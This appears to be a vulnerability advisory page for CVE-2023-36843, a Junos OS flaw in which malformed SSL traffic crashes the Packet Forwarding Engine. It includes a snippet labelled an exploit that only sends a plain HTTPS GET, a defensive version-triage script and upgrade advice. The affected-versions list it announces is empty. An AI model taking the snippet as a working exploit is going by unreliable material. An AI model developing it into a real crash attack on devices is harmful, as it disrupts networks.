CVE-2023-36843 is an Improper Handling of Inconsistent Special Elements vulnerability in the Junos Services Framework (jsf) module of Juniper Networks Junos OS. It allows an unauthenticated, network-based attacker to crash the Packet Forwarding Engine (PFE). The result is a Denial of Service (DoS), and the affected device requires a manual restart to recover.

Affected Devices

This vulnerability affects devices that have Juniper Networks Advanced Threat Prevention (ATP) Cloud enabled with Encrypted Traffic Insights, configured via the security-metadata-streaming policy. Devices running the following versions of Juniper Networks Junos OS are vulnerable:

Exploit Details

When an attacker sends malformed SSL traffic to a vulnerable device, the Packet Forwarding Engine (PFE) crashes, leading to a DoS condition in which the device no longer processes traffic. The device can only recover through a manual restart.

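An example of a code snippet for the exploit could be the following. As written, it only opens an SSL connection to port 443 and sends an ordinary HTTP GET request; it does not itself construct malformed SSL traffic.

import socket
import ssl

target_ip = "192.168.1.1"

# ssl.wrap_socket() was removed in Python 3.12; build an SSLContext instead.
# PROTOCOL_SSLv3 exists only when the underlying OpenSSL build still supports SSLv3.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv3)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = context.wrap_socket(sock)
ssl_sock.connect((target_ip, 443))
# send() requires bytes, not str
ssl_sock.send(("GET / HTTP/1.1\r\nHost: " + target_ip + "\r\n\r\n").encode())
response = ssl_sock.recv(1024)
print(response)
ssl_sock.close()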

Note: Be sure to replace 192.168.1.1 with the actual target device's IP address.

Original References

Juniper Networks Security Advisory

MITRE CVE-2023-36843 Record

Recommendations

To mitigate this vulnerability, users are advised to upgrade their Juniper Networks Junos OS to the following versions:

22.4R2-S1, 22.4R3 or later (only for 22.4)

Juniper Networks strongly recommends that users apply the necessary updates to protect their devices from this potentially disruptive vulnerability.
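
For triaging an inventory against the fixed releases listed above, the following is an added example (not code from Juniper or from the original page). It assumes version strings of the form 22.4R2-S1.3 and treats any configuration line containing the keyword security-metadata-streaming as the feature being configured; the sample configuration lines are constructed. Trains other than 22.4 are reported as "check-advisory" because this page lists fixed releases only for 22.4.

```python
import re

# Fixed releases stated on this page (22.4 train only): 22.4R2-S1, 22.4R3 or later.
FIXED_TRAIN = (22, 4)
FIXED_MIN = (2, 1)  # (R, S) for 22.4R2-S1; 22.4R3 and later compare higher

VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:-S(\d+))?")

# Constructed sample configurations for illustration only.
SAMPLE_CONFIG_ON = "set system host-name lab-fw\nset services security-metadata-streaming policy EXAMPLE-POLICY\n"
SAMPLE_CONFIG_OFF = "set system host-name lab-fw\n"

def parse_junos_version(version):
    """Return ((major, minor), (R, S)) for e.g. '22.4R2-S1.3', or None if unparseable."""
    m = VERSION_RE.match(version.strip())
    if not m:
        return None
    major, minor, rel, svc = m.groups()
    return (int(major), int(minor)), (int(rel), int(svc or 0))

def feature_enabled(config_text):
    """Assumption: a keyword match on non-comment lines is enough for triage."""
    return any("security-metadata-streaming" in line
               for line in config_text.splitlines()
               if not line.lstrip().startswith("#"))

def assess(version, config_text):
    """Classify one device from its version string and configuration text."""
    parsed = parse_junos_version(version)
    if parsed is None:
        return "unknown-version"
    train, release = parsed
    if train != FIXED_TRAIN:
        return "check-advisory"  # page gives no fixed release for this train
    if release >= FIXED_MIN:
        return "fixed"
    return "vulnerable" if feature_enabled(config_text) else "feature-not-configured"

if __name__ == "__main__":
    for ver, cfg in [("22.4R1-S2", SAMPLE_CONFIG_ON), ("22.4R2-S1.3", SAMPLE_CONFIG_ON),
                     ("22.4R2.5", SAMPLE_CONFIG_OFF), ("21.4R3", SAMPLE_CONFIG_ON)]:
        print(ver, "->", assess(ver, cfg))
```

Devices reported as "feature-not-configured" still run an unfixed release and should be scheduled for upgrade in case the policy is enabled later.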

Timeline

Published on: 10/12/2023 23:15:11 UTC
Last modified on: 10/17/2023 15:58:59 UTC